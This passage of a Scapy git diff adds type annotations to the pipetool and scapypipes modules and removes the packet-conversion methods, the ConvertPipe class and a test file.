scapy/pipetool.py | 373 +++++++++++++++++++++------------- scapy/plist.py | 33 --- scapy/scapypipes.py | 127 ++++++++---- test/packet.uts | 299 --------------------------- test/pipetool.uts | 77 +------ 9 files changed, 341 insertions(+), 646 deletions(-) delete mode 100644 test/packet.uts diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index f9837a621c8..ecab6dc63e3 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -13,6 +13,7 @@ scapy/arch/__init__.py scapy/arch/common.py scapy/arch/linux.py scapy/arch/unix.py +scapy/asn1/__init__.py scapy/asn1/asn1.py scapy/asn1/ber.py scapy/asn1/mib.py @@ -31,10 +32,12 @@ scapy/fields.py scapy/interfaces.py scapy/main.py scapy/packet.py +scapy/pipetool.py scapy/plist.py scapy/pton_ntop.py scapy/route.py scapy/route6.py +scapy/scapypipes.py scapy/sendrecv.py scapy/sessions.py scapy/supersocket.py @@ -76,4 +79,4 @@ scapy/contrib/isotp/isotp_utils.py scapy/contrib/roce.py # TEST -test/testsocket.py \ No newline at end of file +test/testsocket.py diff --git a/scapy/automaton.py b/scapy/automaton.py index fb3bacd2b21..d53e1726156 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -42,6 +42,7 @@ Deque, Dict, Generic, + Iterable, Iterator, List, Optional, @@ -56,7 +57,7 @@ def select_objects(inputs, remain): - # type: (List[Any], Union[float, int, None]) -> List[Any] + # type: (Iterable[Any], Union[float, int, None]) -> List[Any] """ Select objects. Same than: ``select.select(inputs, [], [], remain)`` diff --git a/scapy/config.py b/scapy/config.py index 522ca5099ac..f62b6962db9 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -48,6 +48,8 @@ if TYPE_CHECKING: # Do not import at runtime from scapy.packet import Packet + import scapy.asn1.asn1 + import scapy.asn1.mib ############ # Config # diff --git a/scapy/packet.py b/scapy/packet.py index 6f740df697f..7ef6a3191ec 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1634,69 +1634,6 @@ def command(self): c += "/" + pc return c - def convert_to(self, other_cls, **kwargs): - # type: (Type[Packet], **Any) -> Packet - """Converts this Packet to another type. - - This is not guaranteed to be a lossless process. - - By default, this only implements conversion to ``Raw``. - - :param other_cls: Reference to a Packet class to convert to. - :type other_cls: Type[scapy.packet.Packet] - :return: Converted form of the packet. - :rtype: other_cls - :raises TypeError: When conversion is not possible - """ - if not issubtype(other_cls, Packet): - raise TypeError("{} must implement Packet".format(other_cls)) - - if other_cls is Raw: - return Raw(raw(self)) - - if "_internal" not in kwargs: - return other_cls.convert_packet(self, _internal=True, **kwargs) - - raise TypeError("Cannot convert {} to {}".format( - type(self).__name__, other_cls.__name__)) - - @classmethod - def convert_packet(cls, pkt, **kwargs): - # type: (Packet, **Any) -> Packet - """Converts another packet to be this type. - - This is not guaranteed to be a lossless process. - - :param pkt: The packet to convert. - :type pkt: scapy.packet.Packet - :return: Converted form of the packet. - :rtype: cls - :raises TypeError: When conversion is not possible - """ - if not isinstance(pkt, Packet): - raise TypeError("Can only convert Packets") - - if "_internal" not in kwargs: - return pkt.convert_to(cls, _internal=True, **kwargs) - - raise TypeError("Cannot convert {} to {}".format( - type(pkt).__name__, cls.__name__)) - - @classmethod - def convert_packets(cls, - pkts, # type: List[Packet] - **kwargs # type: Any - ): - # type: (...) -> Iterator[Iterator[Packet]] - """Converts many packets to this type. - - This is implemented as a generator. - - See ``Packet.convert_packet``. - """ - for pkt in pkts: - yield cls.convert_packet(pkt, **kwargs) - class NoPayload(Packet): def __new__(cls, *args, **kargs): @@ -1895,11 +1832,6 @@ def mysummary(self): return "Raw %r" % self.load return Packet.mysummary(self) - @classmethod - def convert_packet(cls, pkt, **kwargs): - # type: (Packet, **Any) -> Raw - return Raw(raw(pkt)) - class Padding(Raw): name = "Padding" diff --git a/scapy/pipetool.py b/scapy/pipetool.py index da02ede8a12..e998a992fb5 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -20,14 +20,27 @@ from scapy.config import conf from scapy.utils import get_temp_file, do_graph -from scapy.compat import _Generic_metaclass +from scapy.compat import ( + Any, + Callable, + Dict, + Iterable, + Optional, + Set, + Tuple, + Union, + Type, + TypeVar, + _Generic_metaclass, +) -class PipeEngine(ObjectPipe): - pipes = {} +class PipeEngine(ObjectPipe[str]): + pipes = {} # type: Dict[str, Type[Pipe]] @classmethod def list_pipes(cls): + # type: () -> None for pn, pc in sorted(cls.pipes.items()): doc = pc.__doc__ or "" if doc: @@ -36,6 +49,7 @@ def list_pipes(cls): @classmethod def list_pipes_detailed(cls): + # type: () -> None for pn, pc in sorted(cls.pipes.items()): if pc.__doc__: print("###### %s\n %s" % (pn, pc.__doc__)) @@ -43,35 +57,41 @@ def list_pipes_detailed(cls): print("###### %s" % pn) def __init__(self, *pipes): + # type: (*Pipe) -> None ObjectPipe.__init__(self, "PipeEngine") - self.active_pipes = set() - self.active_sources = set() - self.active_drains = set() - self.active_sinks = set() + self.active_pipes = set() # type: Set[Pipe] + self.active_sources = set() # type: Set[Union[Source, PipeEngine]] + self.active_drains = set() # type: Set[Pipe] + self.active_sinks = set() # type: Set[Pipe] self._add_pipes(*pipes) self.thread_lock = Lock() self.command_lock = Lock() - self.thread = None + self.thread = None # type: Optional[Thread] def __getattr__(self, attr): + # type: (str) -> Callable[..., Pipe] if attr.startswith("spawn_"): dname = attr[6:] if dname in self.pipes: def f(*args, **kargs): + # type: (*Any, **Any) -> Pipe k = self.pipes[dname] - p = k(*args, **kargs) + p = k(*args, **kargs) # type: Pipe self.add(p) return p return f raise AttributeError(attr) def _read_cmd(self): - return self.recv() + # type: () -> str + return self.recv() # type: ignore def _write_cmd(self, _cmd): + # type: (str) -> None self.send(_cmd) def add_one_pipe(self, pipe): + # type: (Pipe) -> None self.active_pipes.add(pipe) if isinstance(pipe, Source): self.active_sources.add(pipe) @@ -81,16 +101,21 @@ def add_one_pipe(self, pipe): self.active_sinks.add(pipe) def get_pipe_list(self, pipe): - def flatten(p, li): + # type: (Pipe) -> Set[Any] + def flatten(p, # type: Any + li, # type: Set[Pipe] + ): + # type: (...) -> None li.add(p) for q in p.sources | p.sinks | p.high_sources | p.high_sinks: if q not in li: flatten(q, li) - pl = set() + pl = set() # type: Set[Pipe] flatten(pipe, pl) return pl def _add_pipes(self, *pipes): + # type: (*Pipe) -> Set[Pipe] pl = set() for p in pipes: pl |= self.get_pipe_list(p) @@ -100,13 +125,14 @@ def _add_pipes(self, *pipes): return pl def run(self): + # type: () -> None log_runtime.debug("Pipe engine thread started.") try: for p in self.active_pipes: p.start() sources = self.active_sources sources.add(self) - exhausted = set([]) + exhausted = set([]) # type: Set[Pipe] RUN = True STOP_IF_EXHAUSTED = False while RUN and (not STOP_IF_EXHAUSTED or len(sources) > 1): @@ -146,7 +172,8 @@ def run(self): log_runtime.debug("Pipe engine thread stopped.") def start(self): - if self.thread_lock.acquire(0): + # type: () -> None + if self.thread_lock.acquire(False): _t = Thread(target=self.run, name="scapy.pipetool.PipeEngine") _t.daemon = True _t.start() @@ -155,9 +182,11 @@ def start(self): log_runtime.debug("Pipe engine already running") def wait_and_stop(self): + # type: () -> None self.stop(_cmd="B") def stop(self, _cmd="X"): + # type: (str) -> None try: with self.command_lock: if self.thread is not None: @@ -173,112 +202,112 @@ def stop(self, _cmd="X"): print("Interrupted by user.") def add(self, *pipes): - pipes = self._add_pipes(*pipes) + # type: (*Pipe) -> None + _pipes = self._add_pipes(*pipes) with self.command_lock: if self.thread is not None: - for p in pipes: + for p in _pipes: p.start() self._write_cmd("A") def graph(self, **kargs): + # type: (Any) -> None g = ['digraph "pipe" {', "\tnode [shape=rectangle];", ] for p in self.active_pipes: g.append('\t"%i" [label="%s"];' % (id(p), p.name)) g.append("") g.append("\tedge [color=blue, arrowhead=vee];") for p in self.active_pipes: - for q in p.sinks: - g.append('\t"%i" -> "%i";' % (id(p), id(q))) + for s in p.sinks: + g.append('\t"%i" -> "%i";' % (id(p), id(s))) g.append("") g.append("\tedge [color=purple, arrowhead=veevee];") for p in self.active_pipes: - for q in p.high_sinks: - g.append('\t"%i" -> "%i";' % (id(p), id(q))) + for hs in p.high_sinks: + g.append('\t"%i" -> "%i";' % (id(p), id(hs))) g.append("") g.append("\tedge [color=red, arrowhead=diamond];") for p in self.active_pipes: - for q in p.trigger_sinks: - g.append('\t"%i" -> "%i";' % (id(p), id(q))) + for ts in p.trigger_sinks: + g.append('\t"%i" -> "%i";' % (id(p), id(ts))) g.append('}') graph = "\n".join(g) do_graph(graph, **kargs) -class _ConnectorLogic(object): - def __init__(self): - self.sources = set() - self.sinks = set() - self.high_sources = set() - self.high_sinks = set() - self.trigger_sources = set() - self.trigger_sinks = set() - - def __lt__(self, other): - other.sinks.add(self) - self.sources.add(other) - return other - - def __gt__(self, other): - self.sinks.add(other) - other.sources.add(self) - return other - - def __eq__(self, other): - self > other - other > self - return other - - def __lshift__(self, other): - self.high_sources.add(other) - other.high_sinks.add(self) - return other - - def __rshift__(self, other): - self.high_sinks.add(other) - other.high_sources.add(self) - return other - - def __floordiv__(self, other): - self >> other - other >> self - return other - - def __xor__(self, other): - self.trigger_sinks.add(other) - other.trigger_sources.add(self) - return other - - def __hash__(self): - return object.__hash__(self) - - class _PipeMeta(_Generic_metaclass): - def __new__(cls, name, bases, dct): + def __new__(cls, # type: ignore + name, # type: str + bases, # type: Tuple[type, ...] + dct # type: Dict[str, Any] + ): + # type: (...) -> Type[Pipe] c = type.__new__(cls, name, bases, dct) PipeEngine.pipes[name] = c return c -class Pipe(six.with_metaclass(_PipeMeta, _ConnectorLogic)): +_S = TypeVar("_S", bound="Sink") +_TS = TypeVar("_TS", bound="TriggerSink") + + +@six.add_metaclass(_PipeMeta) +class Pipe: def __init__(self, name=None): - _ConnectorLogic.__init__(self) + # type: (Optional[str]) -> None + self.sources = set() # type: Set['Pipe'] + self.sinks = set() # type: Set['Sink'] + self.high_sources = set() # type: Set['Pipe'] + self.high_sinks = set() # type: Set['Sink'] + self.trigger_sources = set() # type: Set['Pipe'] + self.trigger_sinks = set() # type: Set['TriggerSink'] if name is None: name = "%s" % (self.__class__.__name__) self.name = name def _send(self, msg): + # type: (Any) -> None for s in self.sinks: s.push(msg) def _high_send(self, msg): + # type: (Any) -> None for s in self.high_sinks: s.high_push(msg) def _trigger(self, msg=None): + # type: (Any) -> None for s in self.trigger_sinks: s.on_trigger(msg) + def __gt__(self, other): + # type: (_S) -> _S + self.sinks.add(other) + other.sources.add(self) + return other + + def __rshift__(self, other): + # type: (_S) -> _S + self.high_sinks.add(other) + other.high_sources.add(self) + return other + + def __xor__(self, other): + # type: (_TS) -> _TS + self.trigger_sinks.add(other) + other.trigger_sources.add(self) + return other + + def __hash__(self): + # type: () -> int + return object.__hash__(self) + + def __eq__(self, other): + # type: (Any) -> bool + return object.__eq__(self, other) + def __repr__(self): + # type: () -> str ct = conf.color_theme s = "%s%s" % (ct.punct("<"), ct.layer_name(self.name)) if self.sources or self.sinks: @@ -317,29 +346,35 @@ def __repr__(self): s += ct.punct(">") return s + def start(self): + # type: () -> None + pass -class Source(Pipe, ObjectPipe): + def stop(self): + # type: () -> None + pass + + +class Source(Pipe, ObjectPipe[Any]): def __init__(self, name=None): + # type: (Optional[str]) -> None Pipe.__init__(self, name=name) ObjectPipe.__init__(self, name) self.is_exhausted = False def _read_message(self): + # type: () -> Message return Message() def deliver(self): + # type: () -> None msg = self._read_message self._send(msg) def exhausted(self): + # type: () -> bool return self.is_exhausted - def start(self): - pass - - def stop(self): - pass - class Drain(Pipe): """Repeat messages from low/high entries to (resp.) low/high exits @@ -354,17 +389,13 @@ class Drain(Pipe): """ def push(self, msg): + # type: (Any) -> None self._send(msg) def high_push(self, msg): + # type: (Any) -> None self._high_send(msg) - def start(self): - pass - - def stop(self): - pass - class Sink(Pipe): """ @@ -376,6 +407,7 @@ class Sink(Pipe): :type name: str """ def push(self, msg): + # type: (Any) -> None """ Called by :py:class:`PipeEngine` when there is a new message for the low entry. @@ -387,6 +419,7 @@ def push(self, msg): pass def high_push(self, msg): + # type: (Any) -> None """ Called by :py:class:`PipeEngine` when there is a new message for the high entry. @@ -397,28 +430,57 @@ def high_push(self, msg): """ pass - def start(self): - pass + def __lt__(self, other): + # type: (_S) -> _S + other.sinks.add(self) + self.sources.add(other) + return other - def stop(self): + def __lshift__(self, other): + # type: (_S) -> _S + self.high_sources.add(other) + other.high_sinks.add(self) + return other + + def __floordiv__(self, other): + # type: (_S) -> _S + self >> other + other >> self + return other + + def __mod__(self, other): + # type: (_S) -> _S + self > other + other > self + return other + + +class TriggerSink(Sink): + def on_trigger(self, msg): + # type: (Any) -> None pass class AutoSource(Source): def __init__(self, name=None): + # type: (Optional[str]) -> None Source.__init__(self, name=name) def _gen_data(self, msg): + # type: (str) -> None ObjectPipe.send(self, (msg, False, False)) def _gen_high_data(self, msg): + # type: (str) -> None ObjectPipe.send(self, (msg, True, False)) def _exhaust(self): + # type: () -> None ObjectPipe.send(self, (None, None, True)) def deliver(self): - msg, high, exhaust = self.recv() + # type: () -> None + msg, high, exhaust = self.recv() # type: ignore if exhaust: pass if high: @@ -429,18 +491,22 @@ def deliver(self): class ThreadGenSource(AutoSource): def __init__(self, name=None): + # type: (Optional[str]) -> None AutoSource.__init__(self, name=name) self.RUN = False def generate(self): + # type: () -> None pass def start(self): + # type: () -> None self.RUN = True Thread(target=self.generate, name="scapy.pipetool.ThreadGenSource").start() def stop(self): + # type: () -> None self.RUN = False @@ -457,9 +523,11 @@ class ConsoleSink(Sink): """ def push(self, msg): + # type: (str) -> None print(">" + repr(msg)) def high_push(self, msg): + # type: (str) -> None print(">>" + repr(msg)) @@ -480,16 +548,19 @@ class RawConsoleSink(Sink): """ def __init__(self, name=None, newlines=True): + # type: (Optional[str], bool) -> None Sink.__init__(self, name=name) self.newlines = newlines self._write_pipe = 1 def push(self, msg): + # type: (str) -> None if self.newlines: msg += "\n" os.write(self._write_pipe, msg.encode("utf8")) def high_push(self, msg): + # type: (str) -> None if self.newlines: msg += "\n" os.write(self._write_pipe, msg.encode("utf8")) @@ -508,9 +579,12 @@ class CLIFeeder(AutoSource): """ def send(self, msg): + # type: (str) -> int self._gen_data(msg) + return 1 def close(self): + # type: () -> None self.is_exhausted = True @@ -527,7 +601,9 @@ class CLIHighFeeder(CLIFeeder): """ def send(self, msg): + # type: (Any) -> int self._gen_high_data(msg) + return 1 class PeriodicSource(ThreadGenSource): @@ -543,14 +619,17 @@ class PeriodicSource(ThreadGenSource): """ def __init__(self, msg, period, period2=0, name=None): + # type: (Union[Iterable[Any], Any], int, int, Optional[str]) -> None ThreadGenSource.__init__(self, name=name) if not isinstance(msg, (list, set, tuple)): - msg = [msg] - self.msg = msg + self.msg = [msg] # type: Iterable[Any] + else: + self.msg = msg self.period = period self.period2 = period2 def generate(self): + # type: () -> None while self.RUN: empty_gen = True for m in self.msg: @@ -590,6 +669,7 @@ class TermSink(Sink): def __init__(self, name=None, keepterm=True, newlines=True, openearly=True): + # type: (Optional[str], bool, bool, bool) -> None Sink.__init__(self, name=name) self.keepterm = keepterm self.newlines = newlines @@ -598,63 +678,71 @@ def __init__(self, name=None, keepterm=True, newlines=True, if self.openearly: self.start() - def _start_windows(self): - if not self.opened: - self.opened = True - self.__f = get_temp_file() - open(self.__f, "a").close() - self.name = "Scapy" if self.name is None else self.name - # Start a powershell in a new window and print the PID - cmd = "$app = Start-Process PowerShell -ArgumentList '-command &{$host.ui.RawUI.WindowTitle=\\\"%s\\\";Get-Content \\\"%s\\\" -wait}' -passthru; echo $app.Id" % (self.name, self.__f.replace("\\", "\\\\")) # noqa: E501 - proc = subprocess.Popen([conf.prog.powershell, cmd], stdout=subprocess.PIPE) # noqa: E501 - output, _ = proc.communicate() - # This is the process PID - self.pid = int(output) - print("PID: %d" % self.pid) - - def _start_unix(self): - if not self.opened: - self.opened = True - rdesc, self.wdesc = os.pipe() - cmd = ["xterm"] - if self.name is not None: - cmd.extend(["-title", self.name]) - if self.keepterm: - cmd.append("-hold") - cmd.extend(["-e", "cat <&%d" % rdesc]) - self.proc = subprocess.Popen(cmd, close_fds=False) - os.close(rdesc) + if WINDOWS: + def _start_windows(self): + # type: () -> None + if not self.opened: + self.opened = True + self.__f = get_temp_file() + open(self.__f, "a").close() + self.name = "Scapy" if self.name is None else self.name + # Start a powershell in a new window and print the PID + cmd = "$app = Start-Process PowerShell -ArgumentList '-command &{$host.ui.RawUI.WindowTitle=\\\"%s\\\";Get-Content \\\"%s\\\" -wait}' -passthru; echo $app.Id" % (self.name, self.__f.replace("\\", "\\\\")) # noqa: E501 + proc = subprocess.Popen([conf.prog.powershell, cmd], stdout=subprocess.PIPE) # noqa: E501 + output, _ = proc.communicate() + # This is the process PID + self.pid = int(output) + print("PID: %d" % self.pid) + + def _stop_windows(self): + # type: () -> None + if not self.keepterm: + self.opened = False + # Recipe to kill process with PID + # http://code.activestate.com/recipes/347462-terminating-a-subprocess-on-windows/ + import ctypes + PROCESS_TERMINATE = 1 + handle = ctypes.windll.kernel32.OpenProcess(PROCESS_TERMINATE, False, self.pid) # noqa: E501 + ctypes.windll.kernel32.TerminateProcess(handle, -1) + ctypes.windll.kernel32.CloseHandle(handle) + else: + def _start_unix(self): + # type: () -> None + if not self.opened: + self.opened = True + rdesc, self.wdesc = os.pipe() + cmd = ["xterm"] + if self.name is not None: + cmd.extend(["-title", self.name]) + if self.keepterm: + cmd.append("-hold") + cmd.extend(["-e", "cat <&%d" % rdesc]) + self.proc = subprocess.Popen(cmd, close_fds=False) + os.close(rdesc) + + def _stop_unix(self): + # type: () -> None + if not self.keepterm: + self.opened = False + self.proc.kill() + self.proc.wait() def start(self): + # type: () -> None if WINDOWS: return self._start_windows() else: return self._start_unix() - def _stop_windows(self): - if not self.keepterm: - self.opened = False - # Recipe to kill process with PID - # http://code.activestate.com/recipes/347462-terminating-a-subprocess-on-windows/ - import ctypes - PROCESS_TERMINATE = 1 - handle = ctypes.windll.kernel32.OpenProcess(PROCESS_TERMINATE, False, self.pid) # noqa: E501 - ctypes.windll.kernel32.TerminateProcess(handle, -1) - ctypes.windll.kernel32.CloseHandle(handle) - - def _stop_unix(self): - if not self.keepterm: - self.opened = False - self.proc.kill() - self.proc.wait() - def stop(self): + # type: () -> None if WINDOWS: return self._stop_windows() else: return self._stop_unix() def _print(self, s): + # type: (str) -> None if self.newlines: s += "\n" if WINDOWS: @@ -665,9 +753,11 @@ def _print(self, s): os.write(self.wdesc, s.encode()) def push(self, msg): + # type: (str) -> None self._print(str(msg)) def high_push(self, msg): + # type: (str) -> None self._print(str(msg)) @@ -687,16 +777,20 @@ class QueueSink(Sink): """ def __init__(self, name=None): + # type: (Optional[str]) -> None Sink.__init__(self, name=name) self.q = six.moves.queue.Queue() def push(self, msg): + # type: (Any) -> None self.q.put(msg) def high_push(self, msg): + # type: (Any) -> None self.q.put(msg) def recv(self, block=True, timeout=None): + # type: (bool, Optional[int]) -> Optional[Any] """ Reads the next message from the queue. @@ -714,7 +808,7 @@ def recv(self, block=True, timeout=None): try: return self.q.get(block=block, timeout=timeout) except six.moves.queue.Empty: - pass + return None class TransformDrain(Drain): @@ -730,13 +824,16 @@ class TransformDrain(Drain): """ def __init__(self, f, name=None): + # type: (Callable[[Any], None], Optional[str]) -> None Drain.__init__(self, name=name) self.f = f def push(self, msg): + # type: (Any) -> None self._send(self.f(msg)) def high_push(self, msg): + # type: (Any) -> None self._high_send(self.f(msg)) @@ -753,9 +850,11 @@ class UpDrain(Drain): """ def push(self, msg): + # type: (Any) -> None self._high_send(msg) def high_push(self, msg): + # type: (Any) -> None pass @@ -772,7 +871,9 @@ class DownDrain(Drain): """ def push(self, msg): + # type: (Any) -> None pass def high_push(self, msg): + # type: (Any) -> None self._send(msg) diff --git a/scapy/plist.py b/scapy/plist.py index 6e959f9b19d..6eb033f6964 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -741,39 +741,6 @@ def getlayer(self, cls, # type: Packet name, stats ) - def convert_to(self, - other_cls, # type: Type[Packet] - name=None, # type: Optional[str] - stats=None # type: Optional[List[Type[Packet]]] - ): - # type: (...) -> PacketList - """Converts all packets to another type. - - See ``Packet.convert_to`` for more info. - - :param other_cls: reference to a Packet class to convert to - :type other_cls: Type[scapy.packet.Packet] - - :param name: optional name for the new PacketList - :type name: Optional[str] - - :param stats: optional list of protocols to give stats on; - if not specified, inherits from this PacketList. - :type stats: Optional[List[Type[scapy.packet.Packet]]] - - :rtype: scapy.plist.PacketList - """ - if name is None: - name = "{} converted to {}".format( - self.listname, other_cls.__name__) - if stats is None: - stats = self.stats - - return PacketList( - [self._elt2pkt(p).convert_to(other_cls) for p in self.res], - name, stats - ) - class PacketList(_PacketList[Packet], BasePacketList[Packet], diff --git a/scapy/scapypipes.py b/scapy/scapypipes.py index 2cbc6d77022..38590ca7831 100644 --- a/scapy/scapypipes.py +++ b/scapy/scapypipes.py @@ -8,11 +8,23 @@ import subprocess from scapy.modules.six.moves.queue import Queue, Empty -from scapy.pipetool import Source, Drain, Sink +from scapy.automaton import ObjectPipe from scapy.config import conf from scapy.compat import raw +from scapy.interfaces import _GlobInterfaceType +from scapy.packet import Packet +from scapy.pipetool import Source, Drain, Sink from scapy.utils import ContextManagerSubprocess, PcapReader, PcapWriter +from scapy.supersocket import SuperSocket +from scapy.compat import ( + Any, + Callable, + List, + Optional, + cast, +) + class SniffSource(Source): """Read packets from an interface and send them to low exit. @@ -35,29 +47,39 @@ class SniffSource(Source): :param socket: A ``SuperSocket`` to sniff packets from. """ - def __init__(self, iface=None, filter=None, socket=None, name=None): + def __init__(self, + iface=None, # type: Optional[str] + filter=None, # type: Optional[Any] + socket=None, # type: Optional[SuperSocket] + name=None, # type: Optional[Any] + ): + # type: (...) -> None Source.__init__(self, name=name) if (iface or filter) and socket: raise ValueError("iface and filter options are mutually exclusive " "with socket") - self.s = socket + self.s = cast(SuperSocket, socket) self.iface = iface self.filter = filter def start(self): + # type: () -> None if not self.s: self.s = conf.L2listen(iface=self.iface, filter=self.filter) def stop(self): + # type: () -> None if self.s: self.s.close() def fileno(self): + # type: () -> int return self.s.fileno() def deliver(self): + # type: () -> None try: pkt = self.s.recv() if pkt is not None: @@ -79,21 +101,26 @@ class RdpcapSource(Source): """ def __init__(self, fname, name=None): + # type: (str, Optional[Any]) -> None Source.__init__(self, name=name) self.fname = fname self.f = PcapReader(self.fname) def start(self): + # type: () -> None self.f = PcapReader(self.fname) self.is_exhausted = False def stop(self): + # type: () -> None self.f.close() def fileno(self): + # type: () -> int return self.f.fileno() def deliver(self): + # type: () -> None try: p = self.f.recv() self._send(p) @@ -114,23 +141,28 @@ class InjectSink(Sink): """ def __init__(self, iface=None, name=None): + # type: (Optional[_GlobInterfaceType], Optional[str]) -> None Sink.__init__(self, name=name) if iface is None: iface = conf.iface self.iface = iface def start(self): + # type: () -> None self.s = conf.L2socket(iface=self.iface) def stop(self): + # type: () -> None self.s.close() def push(self, msg): + # type: (Packet) -> None self.s.send(msg) class Inject3Sink(InjectSink): def start(self): + # type: () -> None self.s = conf.L3socket(iface=self.iface) @@ -173,21 +205,25 @@ class WrpcapSink(Sink): """ def __init__(self, fname, name=None, linktype=None): + # type: (str, Optional[str], Optional[int]) -> None Sink.__init__(self, name=name) self.fname = fname - self.f = None + self.f = None # type: Optional[PcapWriter] self.linktype = linktype def start(self): + # type: () -> None self.f = PcapWriter(self.fname, linktype=self.linktype) def stop(self): + # type: () -> None if self.f: self.f.flush() self.f.close() def push(self, msg): - if msg: + # type: (Packet) -> None + if msg and self.f: self.f.write(msg) @@ -229,10 +265,12 @@ class WiresharkSink(WrpcapSink): """ def __init__(self, name=None, linktype=None, args=None): - WrpcapSink.__init__(self, fname=None, name=name, linktype=linktype) + # type: (Optional[Any], Optional[int], Optional[List[str]]) -> None + WrpcapSink.__init__(self, fname="", name=name, linktype=linktype) self.args = args def start(self): + # type: () -> None # Wireshark must be running first, because PcapWriter will block until # data has been read! with ContextManagerSubprocess(conf.prog.wireshark): @@ -247,7 +285,7 @@ def start(self): stderr=None, ) - self.fname = proc.stdin + self.fname = proc.stdin # type: ignore WrpcapSink.start(self) @@ -264,17 +302,20 @@ class UDPDrain(Drain): """ def __init__(self, ip="127.0.0.1", port=1234): + # type: (str, int) -> None Drain.__init__(self) self.ip = ip self.port = port def push(self, msg): + # type: (Packet) -> None from scapy.layers.inet import IP, UDP if IP in msg and msg[IP].proto == 17 and UDP in msg: payload = msg[UDP].payload self._high_send(raw(payload)) def high_push(self, msg): + # type: (Packet) -> None from scapy.layers.inet import IP, UDP p = IP(dst=self.ip) / UDP(sport=1234, dport=self.port) / msg self._send(p) @@ -293,16 +334,20 @@ class FDSourceSink(Source): """ def __init__(self, fd, name=None): + # type: (ObjectPipe[Any], Optional[Any]) -> None Source.__init__(self, name=name) self.fd = fd def push(self, msg): + # type: (str) -> None self.fd.write(msg) def fileno(self): + # type: () -> int return self.fd.fileno() def deliver(self): + # type: () -> None self._send(self.fd.read()) @@ -320,26 +365,32 @@ class TCPConnectPipe(Source): __selectable_force_select__ = True def __init__(self, addr="", port=0, name=None): + # type: (str, int, Optional[str]) -> None Source.__init__(self, name=name) self.addr = addr self.port = port - self.fd = None + self.fd = cast(socket.socket, None) def start(self): + # type: () -> None self.fd = socket.socket() self.fd.connect((self.addr, self.port)) def stop(self): + # type: () -> None if self.fd: self.fd.close() def push(self, msg): + # type: (Packet) -> None self.fd.send(msg) def fileno(self): + # type: () -> int return self.fd.fileno() def deliver(self): + # type: () -> None try: msg = self.fd.recv(65536) except socket.error: @@ -364,11 +415,13 @@ class TCPListenPipe(TCPConnectPipe): __selectable_force_select__ = True def __init__(self, addr="", port=0, name=None): + # type: (str, int, Optional[str]) -> None TCPConnectPipe.__init__(self, addr, port, name) self.connected = False self.q = Queue() def start(self): + # type: () -> None self.connected = False self.fd = socket.socket() self.fd.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) @@ -376,12 +429,14 @@ def start(self): self.fd.listen(1) def push(self, msg): + # type: (Packet) -> None if self.connected: self.fd.send(msg) else: self.q.put(msg) def deliver(self): + # type: () -> None if self.connected: try: msg = self.fd.recv(65536) @@ -418,18 +473,22 @@ class UDPClientPipe(TCPConnectPipe): """ def __init__(self, addr="", port=0, name=None): + # type: (str, int, Optional[str]) -> None TCPConnectPipe.__init__(self, addr, port, name) self.connected = False def start(self): + # type: () -> None self.fd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.fd.connect((self.addr, self.port)) self.connected = True def push(self, msg): + # type: (Packet) -> None self.fd.send(msg) def deliver(self): + # type: () -> None if not self.connected: return try: @@ -455,20 +514,24 @@ class UDPServerPipe(TCPListenPipe): """ def __init__(self, addr="", port=0, name=None): + # type: (str, int, Optional[str]) -> None TCPListenPipe.__init__(self, addr, port, name) - self._destination = None + self._destination = None # type: Any def start(self): + # type: () -> None self.fd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.fd.bind((self.addr, self.port)) def push(self, msg): + # type: (Packet) -> None if self._destination: self.fd.sendto(msg, self._destination) else: self.q.put(msg) def deliver(self): + # type: () -> None if self._destination: try: msg = self.fd.recv(65536) @@ -505,10 +568,12 @@ class TriggeredMessage(Drain): """ def __init__(self, msg, name=None): + # type: (str, Optional[Any]) -> None Drain.__init__(self, name=name) self.msg = msg def on_trigger(self, trigmsg): + # type: (bool) -> None self._send(self.msg) self._high_send(self.msg) self._trigger(trigmsg) @@ -527,16 +592,19 @@ class TriggerDrain(Drain): """ def __init__(self, f, name=None): + # type: (Callable[..., None], Optional[str]) -> None Drain.__init__(self, name=name) self.f = f def push(self, msg): + # type: (str) -> None v = self.f(msg) if v: self._trigger(v) self._send(msg) def high_push(self, msg): + # type: (str) -> None v = self.f(msg) if v: self._trigger(v) @@ -556,18 +624,22 @@ class TriggeredValve(Drain): """ def __init__(self, start_state=True, name=None): + # type: (bool, Optional[Any]) -> None Drain.__init__(self, name=name) self.opened = start_state def push(self, msg): + # type: (str) -> None if self.opened: self._send(msg) def high_push(self, msg): + # type: (str) -> None if self.opened: self._high_send(msg) def on_trigger(self, msg): + # type: (bool) -> None self.opened ^= True self._trigger(msg) @@ -585,26 +657,31 @@ class TriggeredQueueingValve(Drain): """ def __init__(self, start_state=True, name=None): + # type: (bool, Optional[Any]) -> None Drain.__init__(self, name=name) self.opened = start_state self.q = Queue() def start(self): + # type: () -> None self.q = Queue() def push(self, msg): + # type: (str) -> None if self.opened: self._send(msg) else: self.q.put((True, msg)) def high_push(self, msg): + # type: (str) -> None if self.opened: self._send(msg) else: self.q.put((False, msg)) def on_trigger(self, msg): + # type: (bool) -> None self.opened ^= True self._trigger(msg) while True: @@ -632,10 +709,12 @@ class TriggeredSwitch(Drain): """ def __init__(self, start_state=True, name=None): + # type: (bool, Optional[Any]) -> None Drain.__init__(self, name=name) self.low = start_state def push(self, msg): + # type: (str) -> None if self.low: self._send(msg) else: @@ -643,34 +722,6 @@ def push(self, msg): high_push = push def on_trigger(self, msg): + # type: (bool) -> None self.low ^= True self._trigger(msg) - - -class ConvertPipe(Drain): - """Packets sent on entry are converted to another type of packet. - - .. code:: - - +-------------+ - >>-|--[convert]--|->> - | | - >-|--[convert]--|-> - +-------------+ - - See ``Packet.convert_packet``. - """ - def __init__(self, low_type=None, high_type=None, name=None): - Drain.__init__(self, name=name) - self.low_type = low_type - self.high_type = high_type - - def push(self, msg): - if self.low_type: - msg = self.low_type.convert_packet(msg) - self._send(msg) - - def high_push(self, msg): - if self.high_type: - msg = self.high_type.convert_packet(msg) - self._high_send(msg) diff --git 